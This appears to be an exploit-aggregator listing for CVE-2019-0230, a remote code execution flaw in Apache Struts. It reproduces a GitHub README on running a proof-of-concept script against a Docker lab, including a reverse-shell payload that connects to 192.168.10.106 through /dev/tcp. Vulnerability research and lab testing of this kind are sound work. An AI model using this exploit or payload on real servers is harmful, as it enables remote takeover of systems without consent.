CVE-2019-0230 PoC — Apache Struts 代码执行漏洞

Source

https://github.com/tw-eason-tseng/CVE-2019-0230_Struts2S2-059

Associated Vulnerability

Title:Apache Struts 代码执行漏洞 (CVE-2019-0230)
Description:Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.

Readme

# CVE-2019-0230_Struts2S2-059

## How to use

### Build Struts252-059 Docker
```shell=
docker-compose up -d
```

### How To Use

python3 poc.py "URL" "shell"

Example(PoC)：
```shell=
python3 poc.py http://127.0.0.1:8080 "touch /tmp/1234"
```

![](https://i.imgur.com/prbzR7M.png)


Example(PoC)-2_Reverse Shell：
```shell=
python3 poc.py http://127.0.0.1:8080 "0<&196;exec 196<>/dev/tcp/192.168.10.106/5051; sh <&196 >&196 2>&196"
```
![](https://i.imgur.com/vKjnqej.png)


### Reference
1. [Struts2 S2-059 Remote Code Execution Vulnerablity(CVE-2019-0230)](https://github.com/vulhub/vulhub/tree/master/struts2/s2-059)
2. [struts2 s2-059远程代码执行漏洞（CVE-2019-0230）](https://www.freebuf.com/vuls/257494.html)
3. [java.lang.Runtime.exec() Payload Workarounds](http://www.jackson-t.ca/runtime-exec-payloads.html)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →